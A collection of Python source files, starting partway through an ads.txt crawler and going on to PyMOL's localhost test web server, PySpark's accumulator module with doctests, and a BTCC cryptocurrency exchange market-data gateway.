# and use that instead. Set as 6 hours for the moment.
if (datetime.datetime.utcnow() -
last_updated < datetime.timedelta(minutes=360)):
# Skip to next domain as this ones got new data.
LOG.debug('Skipping %r domain due to recent update at %r',
domain, last_updated)
return False
return True
def process_domain(self, fetchdata: fetch.FetchResponse) -> None:
"""Process a domains FetchResponse into inserted records and variables.
Pipeline roughly goes as follows.
1. Check FetchResponse data is valid, if not update scraped_at
and return. If it is valid, update the db_domain details we have.
2. Iterate through response tuple, checking what's currently in the
database so we don't insert duplicate records.
3. Try to commit
Args:
fetchdata (FetchResponse): Named tuple of fetch data.
Returns:
None
"""
# Setup a new SQL session.
session = self._session(bind=self.engine)
# Fetch domain from database. This should always exist and will
# raise an sqlalchemy.orm.exc.NoResultFound if nothing is found.
db_domain = session.query(
models.Domain).filter_by(name=fetchdata.domain).one()
LOG.debug('Processing fetchdata for %r', fetchdata.domain)
LOG.debug('Using %r as db_domain.', db_domain)
# If we've got bad data from an endpoint, log this and return.
if not fetchdata.response or not fetchdata.adstxt_present:
# TODO: Pass back more debug data on failure from fetches.
LOG.debug('Bad AdsTxt file found, updating TTLs and returning.')
# Update the last updated at row so we don't try and
# update the record again too soon.
db_domain.last_updated = fetchdata.scraped_at
# This is set to null at creation, explicitly set to False as we
# know that there is not one now.
db_domain.adstxt_present = False
session.add(db_domain)
session.commit()
return
# Else we've got a valid record from Fetch. Update the db_domain
# details we hold locally but don't commit until the end.
else:
db_domain.last_updated = fetchdata.scraped_at
db_domain.adstxt_present = True
session.add(db_domain)
# We want to look back and verify that all of these exist.
processed_records = []
for row in fetchdata.response:
# Transform the rows and add them to a list to validate against.
processed_row = transform.process_row(row)
# Check to see what the row is returning and process.
if isinstance(processed_row, transform.AdsRecord):
# Keep a list of records to compare back with.
processed_records.append(processed_row)
# Check for presence of record in existing Record table.
# If it does, skip to the next record.
try:
record_exists = session.query(
models.Record.supplier_domain,
models.Record.pub_id,
models.Record.supplier_relationship,
models.Record.cert_authority).filter_by(
domain=db_domain,
supplier_domain=processed_row.supplier_domain,
pub_id=processed_row.pub_id,
supplier_relationship=processed_row.supplier_relationship
).one_or_none()
# Something in the query was bad. Skip to the next record.
except SQLAlchemyError as excpt:
LOG.exception('Unprocessable row. %r is bad due to %r',
processed_row, excpt)
continue
if not record_exists:
db_record = models.Record(
domain_id=db_domain.id,
supplier_domain=processed_row.supplier_domain,
pub_id=processed_row.pub_id,
supplier_relationship=processed_row.supplier_relationship,
cert_authority=processed_row.cert_authority,
first_seen=fetchdata.scraped_at,
active=True)
LOG.debug('Adding new record to database, %r', db_record)
try:
session.add(db_record)
except DBAPIError:
LOG.error('Unable to insert... %r', db_record)
else:
LOG.debug('Record already exists in database, skipping.')
elif isinstance(processed_row, transform.AdsVariable):
# Check for presence of variable in Variable table.
# If it does then skip to next record.
variable_exists = session.query(
models.Variable).filter_by(
domain=db_domain,
key=processed_row.key).first()
if not variable_exists:
LOG.debug('New variable %r inserted for %r',
db_domain.name, processed_row.key)
db_variable = models.Variable(
domain_id=db_domain.id,
key=processed_row.key,
value=processed_row.value)
session.add(db_variable)
elif variable_exists.value != processed_row.value:
LOG.debug('Key %r for %r has been updated.',
variable_exists.key, db_domain.name)
variable_exists.value = processed_row.value
session.add(variable_exists)
else:
# Check is there and is up to date.
continue
# Else it's nil, skip to next record.
else:
continue
# Validate that everything in the records table is also in our list
# of processed rows. Run through the record table then variables.
active_records = session.query(
models.Record.supplier_domain,
models.Record.pub_id,
models.Record.supplier_relationship,
models.Record.cert_authority).filter_by(
domain_id=db_domain.id, active=True).all()
# Find what's in active_records but is not in processed_records.
active_records_not_seen = set(active_records).difference(
set(processed_records))
# Set all of these records as inactive.
for record in active_records_not_seen:
LOG.debug('%r was found to be inactive.', record)
session.query(
models.Record).filter_by(
domain_id=db_domain.id,
supplier_domain=record.supplier_domain,
pub_id=record.pub_id,
supplier_relationship=record.supplier_relationship,
cert_authority=record.cert_authority).one().active = False
# Domain is completely processed at this point. Commit all records.
session.commit()
LOG.debug('Session committed and domain processed.')
def fetch_domains(self) -> List[str]:
if self.file:
return self._fetch_from_file(self.file_uri)
else:
return self._query_for_domains(self.es_index, self.es_query)
def _fetch_from_file(self, path) -> List[str]:
with open(path, 'r') as f:
domain_file = f.read()
domains = []
for row in domain_file.split('\n'):
if row:
domains.append(row)
return domains
def _query_for_domains(self, index, body) -> List[str]:
query = json.loads(body)
res = self.es.search(index=index, body=query)
# Return just the domains.
domains = [i['key'] for i
in res['aggregations']['top_domains']['buckets']]
LOG.debug('Fetched total %s domains from ES.', len(domains))
return domains
def _run_once(self) -> None:
"""Query for domains and insert into database.
Pipeline works as follows, we query for domains and check their
viability for searching. We set up a worker thread which processes
fetched results in the background, while in the foreground we generate
a list of futures which fetch using aiohttp/asyncio and are gathered.
These populate a background queue which processes all of these events
until the queue has had all items processed.
It would be best if we used async callbacks or similar that then
updated the database once a fetch was done; this, however, requires
a working asyncio/mysql/sqlalchemy wrapper. Until that exists or we
can spend the time working on one this pattern is the best we can do.
Args:
None
Returns:
None
ATTENTION: This requires databases and connections to be
bootstrapped. If you're manually running this please call
self._bootstrap_db as well.
"""
# Query for domains and filter to see if they're checkable.
domains = [x for x in self.fetch_domains()
if self._check_viability(x)]
def worker():
while True:
# Get a fetch event from the Queue and write to DB.
fetch_event = fetch_queue.get(block=True)
# Check to see if the sentinel value has been pushed in.
if fetch_event is None:
# Let's break out of this loop and exit the function.
break
# Catch the top level exception and continue onto the next
# record.
try:
self.process_domain(fetch_event)
except Exception as e:
LOG.exception(e)
pass
# Ack that event as being done.
fetch_queue.task_done()
# Log this event as being processed.
LOG.debug('Task done %r', fetch_event)
# Set up a Queue and worker for processing fetch events.
fetch_queue = queue.Queue() # type: queue.Queue
thread = threading.Thread(target=worker)
thread.start()
# Most of what we're doing here is waiting on network IO of some kind.
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
async def fetcher(domain):
try:
fetch_event = await fetch.fetch(domain, self.crawler_id)
# Just swallow exceptions here.
except Exception:
pass
else:
fetch_queue.put(fetch_event)
# Setup a list of function calls.
fetches = [fetcher(x) for x in domains]
# This could potentially grow to be very large.
loop.run_until_complete(asyncio.gather(*fetches))
# Close the loop once we're done.
loop.close()
# Block until all tasks are done.
fetch_queue.join()
# Add our sentinel value so the worker quits its loop.
fetch_queue.put(None)
# Close thread now we're done writing to the database.
thread.join()
def run(self) -> None:
LOG.info('Starting adstxt crawler...')
self._bootstrap_db()
LOG.info('Databases bootstrapped...')
while True:
LOG.info('Searching for domains to crawl...')
self._run_once()
LOG.info('Done processing current available domains.')
# There's no sleeping as this process takes ages.
# Just loop round and update anything that's required.
|
justhttpd.py
|
# Copyright (C) Schrodinger, LLC.
# All Rights Reserved
#
# For more information, see LICENSE in PyMOL's home directory.
#
# justhttpd.py
#
# vanilla web server designed for testing multi-origin applications
# by serving up content on 127.0.0.1:xxxx instead of localhost:yyyy
import BaseHTTPServer, cgi, urlparse, socket
import types, os, sys, traceback, threading
class _HTTPRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def do_GET(self):
self.process_request()
def do_POST(self):
self.process_request()
def process_request(self):
"""
parse any URL or FORM arguments and process the request
"""
# verify that the request is coming from localhost
try:
host, port = self.client_address
if host != '127.0.0.1':
self.send_error(403,
"Only localhost requests are allowed (not: %s)"
% host)
else:
self.callback = None
self.parse_args()
self.send_doc()
except socket.error:
pass
def parse_args(self):
if (self.command == "POST"):
self.fs = cgi.FieldStorage(fp=self.rfile, headers=self.headers,
environ = {'REQUEST_METHOD':'POST'},
keep_blank_values = 1)
self.urlpath = self.path
elif (self.command == "GET"):
scheme,netloc,path,params,qs,fragment = urlparse.urlparse(self.path)
self.fs = cgi.FieldStorage(environ = {'REQUEST_METHOD':'GET',
'QUERY_STRING':qs},
keep_blank_values = 1)
self.urlpath = path
else:
self.fs = None
def send_doc(self):
"""
send a document (file) in the current directory or any sub-directory
"""
path_list = self.path.split('/')[1:]
if '..' in path_list: # prevent access to parent directories
self.send_error(404,"Illegal path.")
self.wfile.write(": %s" % self.path)
elif self.server.root == None:
self.send_error(404,"No content root specified.")
else:
try:
full_path = os.path.join(*[self.server.root] +
list(path_list))
print full_path
if os.path.isdir(full_path):
full_path = full_path + "/index.html"
fp = open(full_path,"rb")
self.send_ok(self.guess_mime(full_path))
self.wfile.write(fp.read())
fp.close()
except:
self.send_error(404,"Unable to locate document.")
self.wfile.write(": %s" % self.path)
self.wfile.write(str(sys.exc_info())) # exc_info() is thread safe
# self.wfile.write(sys.exc_value) # exc_value is not thread safe
def guess_mime(self,path):
"""
guess the mime type based on the file extension
"""
if path.endswith('.html'):
return 'text/html'
elif path.endswith('.js'):
return 'application/x-javascript'
elif path.endswith('.jpg'):
return 'image/jpeg'
elif path.endswith('.png'):
return 'image/png'
elif path.endswith('.gif'):
return 'image/gif'
elif path.endswith('.sdf'):
return 'chemical/x-mdl-sdfile'
elif path.endswith('.mol'):
return 'chemical/x-mdl-molfile'
elif path.endswith('.pwg'):
return 'application/x-pymol'
else:
return 'text/plain'
def send_error(self,errcode,errmsg):
try:
self.send_response(errcode)
self.send_header('Content-type', 'text/plain')
self.end_headers()
self.wfile.write("HTTPd-Error: "+errmsg+"\n")
except:
# right now we're swallowing any/all exceptions
# (e.g. Broken Pipe)
pass
def send_ok(self, mime='text/html'):
self.send_response(200)
self.send_header('Content-type', mime)
self.send_header('Pragma','no-cache')
self.send_header('Cache-Control','no-cache, must-revalidate')
self.send_header('Expires','Sat, 10 Jan 2008 01:00:00 GMT')
self.end_headers()
def echo_args(self):
"""
for debugging requests
"""
self.wfile.write("%s\n" % self.command)
if (self.fs):
for k in self.fs.keys():
self.wfile.write("%s = " % k)
# key can have multiple values, as with checkboxes,
# but also arbitrarily
if (isinstance(self.fs[k], types.ListType)):
self.wfile.write("%s\n" % self.fs.getlist(k))
else:
# key can be uploaded file
if (self.fs[k].filename):
self.wfile.write("%s\n" % self.fs[k].filename)
fp = self.fs[k].file
#self.wfile.write("FILE %s" % cgi.escape(repr(fp)))
#self.wfile.write("%s\n" % fp.name)
# fails for StringIO instances
self.wfile.write("%s\n" % repr(fp))
# two ways to get file contents
#file_contents = self.fs.getvalue(k)
#file_contents = fp.read()
#self.wfile.write("%s" % file_contents)
else:
#plain-old key/value
self.wfile.write("%s\n" % self.fs.getvalue(k))
else:
self.wfile.write("No args\n")
class PlainHttpd:
def __init__(self, port=0, root=None):
self.port = int(port)
self.stop_event = threading.Event()
self.stop_event.set()
self.root = root
self.server = BaseHTTPServer.HTTPServer(('', self.port),
_HTTPRequestHandler)
if self.port == 0:
self.port = self.server.socket.getsockname()[1]
self.server.root = self.root
def _server_thread(self):
while not self.stop_event.isSet():
self.server.handle_request()
def start(self): # spawn thread
print " HTTPd: serving requests on http://127.0.0.1:%d" % self.port
t = threading.Thread(target=self._server_thread)
t.setDaemon(1)
self.stop_event.clear()
t.start()
def stop(self):
if not self.stop_event.isSet():
self.stop_event.set()
try: # create a request in order to release the handler
import urllib
urllib.urlopen("http://localhost:%d" % self.port)
except:
pass
self.server.socket.close()
def main():
import os
# initialize the server, with current local working directory as root
server = PlainHttpd(0, ".")
# get a dynamically assigned port number
port = server.port
# start handling requests
server.start()
# now launch a browser pointing at our server
import webbrowser
webbrowser.open("http://127.0.0.1:%d"%port)
if __name__ in [ '__main__', 'pymol' ]:
# intended to be launched with normal Python or
# pymol -qc justhttpd.py
main()
import time
while 1:
time.sleep(1)
|
accumulators.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
>>> from pyspark.context import SparkContext
>>> sc = SparkContext('local', 'test')
>>> a = sc.accumulator(1)
>>> a.value
1
>>> a.value = 2
>>> a.value
2
>>> a += 5
>>> a.value
7
>>> sc.accumulator(1.0).value
1.0
>>> sc.accumulator(1j).value
1j
>>> rdd = sc.parallelize([1,2,3])
>>> def f(x):
... global a
... a += x
>>> rdd.foreach(f)
>>> a.value
13
>>> b = sc.accumulator(0)
>>> def g(x):
... b.add(x)
>>> rdd.foreach(g)
>>> b.value
6
>>> from pyspark.accumulators import AccumulatorParam
>>> class VectorAccumulatorParam(AccumulatorParam):
... def zero(self, value):
... return [0.0] * len(value)
... def addInPlace(self, val1, val2):
... for i in range(len(val1)):
... val1[i] += val2[i]
... return val1
>>> va = sc.accumulator([1.0, 2.0, 3.0], VectorAccumulatorParam())
>>> va.value
[1.0, 2.0, 3.0]
>>> def g(x):
... global va
... va += [x] * 3
>>> rdd.foreach(g)
>>> va.value
[7.0, 8.0, 9.0]
>>> rdd.map(lambda x: a.value).collect() # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
Py4JJavaError:...
>>> def h(x):
... global a
... a.value = 7
>>> rdd.foreach(h) # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
Py4JJavaError:...
>>> sc.accumulator([1.0, 2.0, 3.0]) # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
TypeError:...
"""
import sys
import select
import struct
if sys.version < '3':
import SocketServer
else:
import socketserver as SocketServer
import threading
from pyspark.serializers import read_int, PickleSerializer
__all__ = ['Accumulator', 'AccumulatorParam']
pickleSer = PickleSerializer()
# Holds accumulators registered on the current machine, keyed by ID. This is then used to send
# the local accumulator updates back to the driver program at the end of a task.
_accumulatorRegistry = {}
def _deserialize_accumulator(aid, zero_value, accum_param):
from pyspark.accumulators import _accumulatorRegistry
# If this accumulator has already been deserialized, don't overwrite it.
if aid in _accumulatorRegistry:
return _accumulatorRegistry[aid]
else:
accum = Accumulator(aid, zero_value, accum_param)
accum._deserialized = True
_accumulatorRegistry[aid] = accum
return accum
class Accumulator(object):
"""
A shared variable that can be accumulated, i.e., has a commutative and associative "add"
operation. Worker tasks on a Spark cluster can add values to an Accumulator with the `+=`
operator, but only the driver program is allowed to access its value, using `value`.
Updates from the workers get propagated automatically to the driver program.
While :class:`SparkContext` supports accumulators for primitive data types like :class:`int` and
:class:`float`, users can also define accumulators for custom types by providing a custom
:class:`AccumulatorParam` object. Refer to the doctest of this module for an example.
"""
def __init__(self, aid, value, accum_param):
"""Create a new Accumulator with a given initial value and AccumulatorParam object"""
from pyspark.accumulators import _accumulatorRegistry
self.aid = aid
self.accum_param = accum_param
self._value = value
self._deserialized = False
_accumulatorRegistry[aid] = self
def __reduce__(self):
"""Custom serialization; saves the zero value from our AccumulatorParam"""
param = self.accum_param
return (_deserialize_accumulator, (self.aid, param.zero(self._value), param))
@property
def value(self):
"""Get the accumulator's value; only usable in driver program"""
if self._deserialized:
raise Exception("Accumulator.value cannot be accessed inside tasks")
return self._value
@value.setter
def value(self, value):
"""Sets the accumulator's value; only usable in driver program"""
if self._deserialized:
raise Exception("Accumulator.value cannot be accessed inside tasks")
self._value = value
def add(self, term):
"""Adds a term to this accumulator's value"""
self._value = self.accum_param.addInPlace(self._value, term)
def __iadd__(self, term):
"""The += operator; adds a term to this accumulator's value"""
self.add(term)
return self
def __str__(self):
return str(self._value)
def __repr__(self):
return "Accumulator<id=%i, value=%s>" % (self.aid, self._value)
class AccumulatorParam(object):
"""
Helper object that defines how to accumulate values of a given type.
"""
def zero(self, value):
"""
Provide a "zero value" for the type, compatible in dimensions with the
provided `value` (e.g., a zero vector)
"""
raise NotImplementedError
def addInPlace(self, value1, value2):
"""
Add two values of the accumulator's data type, returning a new value;
for efficiency, can also update `value1` in place and return it.
"""
raise NotImplementedError
class AddingAccumulatorParam(AccumulatorParam):
"""
An AccumulatorParam that uses the + operators to add values. Designed for simple types
such as integers, floats, and lists. Requires the zero value for the underlying type
as a parameter.
"""
def __init__(self, zero_value):
self.zero_value = zero_value
def zero(self, value):
return self.zero_value
def addInPlace(self, value1, value2):
value1 += value2
return value1
# Singleton accumulator params for some standard types
INT_ACCUMULATOR_PARAM = AddingAccumulatorParam(0)
FLOAT_ACCUMULATOR_PARAM = AddingAccumulatorParam(0.0)
COMPLEX_ACCUMULATOR_PARAM = AddingAccumulatorParam(0.0j)
class _UpdateRequestHandler(SocketServer.StreamRequestHandler):
"""
This handler will keep polling updates from the same socket until the
server is shutdown.
"""
def handle(self):
from pyspark.accumulators import _accumulatorRegistry
auth_token = self.server.auth_token
def poll(func):
while not self.server.server_shutdown:
# Poll every 1 second for new data -- don't block in case of shutdown.
r, _, _ = select.select([self.rfile], [], [], 1)
if self.rfile in r:
if func():
break
def accum_updates():
num_updates = read_int(self.rfile)
for _ in range(num_updates):
(aid, update) = pickleSer._read_with_length(self.rfile)
_accumulatorRegistry[aid] += update
# Write a byte in acknowledgement
self.wfile.write(struct.pack("!b", 1))
return False
def authenticate_and_accum_updates():
received_token = self.rfile.read(len(auth_token))
if isinstance(received_token, bytes):
received_token = received_token.decode("utf-8")
if (received_token == auth_token):
accum_updates()
# we've authenticated, we can break out of the first loop now
return True
else:
raise Exception(
"The value of the provided token to the AccumulatorServer is not correct.")
# first we keep polling till we've received the authentication token
poll(authenticate_and_accum_updates)
# now we've authenticated, don't need to check for the token anymore
poll(accum_updates)
class AccumulatorServer(SocketServer.TCPServer):
"""
A simple TCP server that intercepts shutdown() in order to interrupt
our continuous polling on the handler.
"""
def __init__(self, server_address, RequestHandlerClass, auth_token):
SocketServer.TCPServer.__init__(self, server_address, RequestHandlerClass)
self.auth_token = auth_token
server_shutdown = False
def shutdown(self):
self.server_shutdown = True
SocketServer.TCPServer.shutdown(self)
self.server_close()
def _start_update_server(auth_token):
"""Start a TCP server to receive accumulator updates in a daemon thread, and returns it"""
server = AccumulatorServer(("localhost", 0), _UpdateRequestHandler, auth_token)
thread = threading.Thread(target=server.serve_forever)
thread.daemon = True
thread.start()
return server
if __name__ == "__main__":
import doctest
(failure_count, test_count) = doctest.testmod()
if failure_count:
sys.exit(-1)
|
btcc.py
|
from restful_api_socket import RESTfulApiSocket
from exchanges.gateway import ExchangeGateway
from market_data import L2Depth, Trade
from util import Logger
from instrument import Instrument
from clients.sql_template import SqlClientTemplate
import time
import threading
from functools import partial
from datetime import datetime
class ExchGwBtccRestfulApi(RESTfulApiSocket):
"""
Exchange gateway BTCC RESTfulApi
"""
def __init__(self):
RESTfulApiSocket.__init__(self)
@classmethod
def get_timestamp_offset(cls):
return 1
@classmethod
def get_order_book_timestamp_field_name(cls):
return ''
@classmethod
def get_trades_timestamp_field_name(cls):
return ''
@classmethod
def get_bids_field_name(cls):
return ''
@classmethod
def get_asks_field_name(cls):
return ''
@classmethod
def get_trade_side_field_name(cls):
return ''
@classmethod
def get_trade_id_field_name(cls):
return ''
@classmethod
def get_trade_price_field_name(cls):
return ''
@classmethod
def get_trade_volume_field_name(cls):
return ''
@classmethod
def get_order_book_link(cls, instmt):
return ""
@classmethod
def get_trades_link(cls, instmt, trade_id=''):
return ""
@classmethod
def parse_l2_depth(cls, instmt, raw):
"""
Parse raw data to L2 depth
:param instmt: Instrument
:param raw: Raw data in JSON
"""
l2_depth = L2Depth()
keys = list(raw.keys())
if cls.get_order_book_timestamp_field_name() in keys and \
cls.get_bids_field_name() in keys and \
cls.get_asks_field_name() in keys:
# Date time
date_time = float(raw[cls.get_order_book_timestamp_field_name()])
date_time = date_time / cls.get_timestamp_offset()
l2_depth.date_time = datetime.utcfromtimestamp(date_time).strftime("%Y%m%d %H:%M:%S.%f")
# Bids
bids = raw[cls.get_bids_field_name()]
bids = sorted(bids, key=lambda x: x[0], reverse=True)
for i in range(0, min(5, len(bids))):
l2_depth.bids[i].price = float(bids[i][0]) if not isinstance(bids[i][0], float) else bids[i][0]
l2_depth.bids[i].volume = float(bids[i][1]) if not isinstance(bids[i][1], float) else bids[i][1]
# Asks
asks = raw[cls.get_asks_field_name()]
asks = sorted(asks, key=lambda x: x[0])
for i in range(0, min(5, len(asks))):
l2_depth.asks[i].price = float(asks[i][0]) if not isinstance(asks[i][0], float) else asks[i][0]
l2_depth.asks[i].volume = float(asks[i][1]) if not isinstance(asks[i][1], float) else asks[i][1]
else:
raise Exception('Does not contain order book keys in instmt %s-%s.\nOriginal:\n%s' % \
(instmt.get_exchange_name(), instmt.get_instmt_name(), \
raw))
return l2_depth
@classmethod
def parse_trade(cls, instmt, raw):
"""
:param instmt: Instrument
:param raw: Raw data in JSON
:return:
"""
trade = Trade()
keys = list(raw.keys())
if cls.get_trades_timestamp_field_name() in keys and \
cls.get_trade_id_field_name() in keys and \
cls.get_trade_price_field_name() in keys and \
cls.get_trade_volume_field_name() in keys:
# Date time
date_time = float(raw[cls.get_trades_timestamp_field_name()])
date_time = date_time / cls.get_timestamp_offset()
trade.date_time = datetime.utcfromtimestamp(date_time).strftime("%Y%m%d %H:%M:%S.%f")
# Trade side
trade.trade_side = 1
# Trade id
trade.trade_id = str(raw[cls.get_trade_id_field_name()])
# Trade price
trade.trade_price = float(str(raw[cls.get_trade_price_field_name()]))
# Trade volume
trade.trade_volume = float(str(raw[cls.get_trade_volume_field_name()]))
else:
raise Exception('Does not contain trade keys in instmt %s-%s.\nOriginal:\n%s' % \
(instmt.get_exchange_name(), instmt.get_instmt_name(), \
raw))
return trade
@classmethod
def get_order_book(cls, instmt):
"""
Get order book
:param instmt: Instrument
:return: Object L2Depth
"""
res = cls.request(cls.get_order_book_link(instmt))
if len(res) > 0:
return cls.parse_l2_depth(instmt=instmt,
raw=res)
else:
return None
@classmethod
def get_trades(cls, instmt):
"""
Get trades
:param instmt: Instrument
:return: List of trades
"""
link = cls.get_trades_link(instmt)
res = cls.request(link)
trades = []
if len(res) > 0:
for t in res:
trade = cls.parse_trade(instmt=instmt,
raw=t)
trades.append(trade)
return trades
class ExchGwBtcc(ExchangeGateway):
"""
Exchange gateway BTCC
"""
def __init__(self, db_clients):
"""
Constructor
:param db_clients: Database clients
"""
ExchangeGateway.__init__(self, ExchGwBtccRestfulApi(), db_clients)
@classmethod
def get_exchange_name(cls):
"""
Get exchange name
:return: Exchange name string
"""
return 'BTCC'
def get_order_book_worker(self, instmt):
"""
Get order book worker
:param instmt: Instrument
"""
while True:
try:
l2_depth = self.api_socket.get_order_book(instmt)
if l2_depth is not None and l2_depth.is_diff(instmt.get_l2_depth()):
instmt.set_prev_l2_depth(instmt.get_l2_depth())
instmt.set_l2_depth(l2_depth)
instmt.incr_order_book_id()
self.insert_order_book(instmt)
except Exception as e:
Logger.error(self.__class__.__name__, "Error in order book: %s" % e)
time.sleep(1)
def get_trades_worker(self, instmt):
"""
Get trades worker thread
:param instmt: Instrument
"""
while True:
try:
ret = self.api_socket.get_trades(instmt)
if ret is None or len(ret) == 0:
time.sleep(1)
continue
except Exception as e:
Logger.error(self.__class__.__name__, "Error in trades: %s" % e)
# Skip to the next poll; 'ret' is not valid after a failed fetch.
time.sleep(1)
continue
for trade in ret:
assert isinstance(trade.trade_id, str), "trade.trade_id(%s) = %s" % (type(trade.trade_id), trade.trade_id)
assert isinstance(instmt.get_exch_trade_id(), str), \
"instmt.get_exch_trade_id()(%s) = %s" % (type(instmt.get_exch_trade_id()), instmt.get_exch_trade_id())
if int(trade.trade_id) > int(instmt.get_exch_trade_id()):
instmt.set_exch_trade_id(trade.trade_id)
instmt.incr_trade_id()
self.insert_trade(instmt, trade)
# After the first time of getting the trade, indicate the instrument
# is recovered
if not instmt.get_recovered():
instmt.set_recovered(True)
time.sleep(1)
def start(self, instmt):
"""
Start the exchange gateway
:param instmt: Instrument
:return List of threads
"""
instmt.set_l2_depth(L2Depth(5))
instmt.set_prev_l2_depth(L2Depth(5))
instmt.set_instmt_snapshot_table_name(self.get_instmt_snapshot_table_name(instmt.get_exchange_name(),
instmt.get_instmt_name()))
self.init_instmt_snapshot_table(instmt)
instmt.set_recovered(False)
t1 = threading.Thread(target=partial(self.get_order_book_worker, instmt))
t1.start()
t2 = threading.Thread(target=partial(self.get_trades_worker, instmt))
t2.start()
return [t1, t2]
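# Hedged usage sketch (assumption, not original code): starting the gateway for one
# instrument spawns an order-book polling thread and a trades polling thread.
#
#   exch = ExchGwBtccSpot([SqlClientTemplate()])
#   instmt = Instrument('BTCC_Spot', 'BTCCNY', 'btccny')
#   threads = exch.start(instmt)      # [order_book_thread, trades_thread]
#   for t in threads:
#       t.join()
#
# The database client and instrument names are placeholders; the __main__ block at
# the bottom of this file wires a single worker directly for testing instead.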
class ExchGwBtccSpotRestfulApi(ExchGwBtccRestfulApi):
"""
    Exchange gateway BTCC Spot Instrument RESTful API
"""
def __init__(self):
ExchGwBtccRestfulApi.__init__(self)
@classmethod
def get_timestamp_offset(cls):
return 1
@classmethod
def get_order_book_timestamp_field_name(cls):
return 'date'
@classmethod
def get_trades_timestamp_field_name(cls):
return 'date'
@classmethod
def get_bids_field_name(cls):
return 'bids'
@classmethod
def get_asks_field_name(cls):
return 'asks'
@classmethod
def get_trade_side_field_name(cls):
return 'type'
@classmethod
def get_trade_id_field_name(cls):
return 'tid'
@classmethod
def get_trade_price_field_name(cls):
return 'price'
@classmethod
def get_trade_volume_field_name(cls):
return 'amount'
@classmethod
def get_order_book_link(cls, instmt):
return "https://data.btcchina.com/data/orderbook?limit=5&market=%s" % instmt.get_instmt_code()
@classmethod
def get_trades_link(cls, instmt):
if int(instmt.get_exch_trade_id()) > 0:
return "https://data.btcchina.com/data/historydata?market=%s&since=%s" % \
(instmt.get_instmt_code(), instmt.get_exch_trade_id())
else:
return "https://data.btcchina.com/data/historydata?limit=100&market=%s" % \
(instmt.get_instmt_code())
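# Illustrative only (using the 'btccny' instrument code from the __main__ block
# below): with no previously seen trade id, get_trades_link above resolves to
#   https://data.btcchina.com/data/historydata?limit=100&market=btccny
# and once a trade id such as 12345678 has been recorded it becomes
#   https://data.btcchina.com/data/historydata?market=btccny&since=12345678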
class ExchGwBtccFutureRestfulApi(ExchGwBtccRestfulApi):
"""
    Exchange gateway BTCC Future Instrument RESTful API
"""
def __init__(self):
ExchGwBtccRestfulApi.__init__(self)
@classmethod
def get_timestamp_offset(cls):
return 1000
@classmethod
def get_order_book_timestamp_field_name(cls):
return 'date'
@classmethod
def get_trades_timestamp_field_name(cls):
return 'Timestamp'
@classmethod
def get_bids_field_name(cls):
return 'bids'
@classmethod
def get_asks_field_name(cls):
return 'asks'
@classmethod
def get_trade_side_field_name(cls):
return 'Side'
@classmethod
def get_trade_id_field_name(cls):
return 'Id'
@classmethod
def get_trade_price_field_name(cls):
return 'Price'
@classmethod
def get_trade_volume_field_name(cls):
return 'Quantity'
@classmethod
def get_order_book_link(cls, instmt):
return "https://pro-data.btcc.com/data/pro/orderbook?limit=5&symbol=%s" % instmt.get_instmt_code()
@classmethod
def get_trades_link(cls, instmt):
if int(instmt.get_exch_trade_id()) > 0:
return "https://pro-data.btcc.com/data/pro/historydata?symbol=%s&since=%s" % \
(instmt.get_instmt_code(), instmt.get_exch_trade_id())
else:
return "https://pro-data.btcc.com/data/pro/historydata?limit=100&symbol=%s" % \
(instmt.get_instmt_code())
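# Similarly for the futures API (the symbol 'XBTCNY' is an assumption, not taken
# from this file): the first poll uses
#   https://pro-data.btcc.com/data/pro/historydata?limit=100&symbol=XBTCNY
# and subsequent polls pass the last seen trade id via the 'since' parameter.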
class ExchGwBtccSpot(ExchGwBtcc):
"""
Exchange gateway BTCC-Spot
"""
def __init__(self, db_clients):
"""
Constructor
        :param db_clients: Database clients
"""
ExchangeGateway.__init__(self, ExchGwBtccSpotRestfulApi(), db_clients)
@classmethod
def get_exchange_name(cls):
"""
Get exchange name
:return: Exchange name string
"""
return 'BTCC_Spot'
class ExchGwBtccFuture(ExchGwBtcc):
"""
Exchange gateway BTCC-Future
"""
def __init__(self, db_clients):
"""
Constructor
        :param db_clients: Database clients
"""
ExchangeGateway.__init__(self, ExchGwBtccFutureRestfulApi(), db_clients)
@classmethod
def get_exchange_name(cls):
"""
Get exchange name
:return: Exchange name string
"""
return 'BTCC_Future'
if __name__ == '__main__':
Logger.init_log()
exchange_name = 'BTCC_Spot'
instmt_name = 'BTCCNY'
instmt_code = 'btccny'
instmt = Instrument(exchange_name, instmt_name, instmt_code)
db_client = SqlClientTemplate()
exch = ExchGwBtccSpot([db_client])
instmt.set_l2_depth(L2Depth(5))
instmt.set_prev_l2_depth(L2Depth(5))
instmt.set_order_book_table_name(exch.get_order_book_table_name(instmt.get_exchange_name(),
instmt.get_instmt_name()))
instmt.set_trades_table_name(exch.get_trades_table_name(instmt.get_exchange_name(),
instmt.get_instmt_name()))
instmt.set_recovered(False)
exch.get_order_book_worker(instmt)